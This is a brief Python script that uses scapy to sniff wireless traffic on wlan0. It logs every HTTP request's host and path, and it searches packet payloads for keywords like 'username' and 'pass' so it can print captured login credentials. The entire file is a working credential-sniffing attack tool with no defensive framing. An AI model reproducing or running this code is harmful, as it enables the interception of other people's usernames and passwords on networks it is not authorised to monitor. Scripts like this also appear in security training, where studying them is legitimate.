#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http


def sniff(interface):
    # This sniff function is doing the packet sniffing and prn does the desired manipulation on the sniffed packet
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = str(packet[scapy.Raw].load)
        keywords = ['username', 'user', 'login', 'uname', 'pass']
        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = str(get_url(packet))
        print('[+] HTTP Request >>' + url)
    login_info = get_login_info(packet)
    if login_info:
        print('\n\n[+] Possible username/password > ' + login_info + '\n\n')

# Sniff from the desired interface for example wlan0, eth0, ... etc
sniff('wlan0')
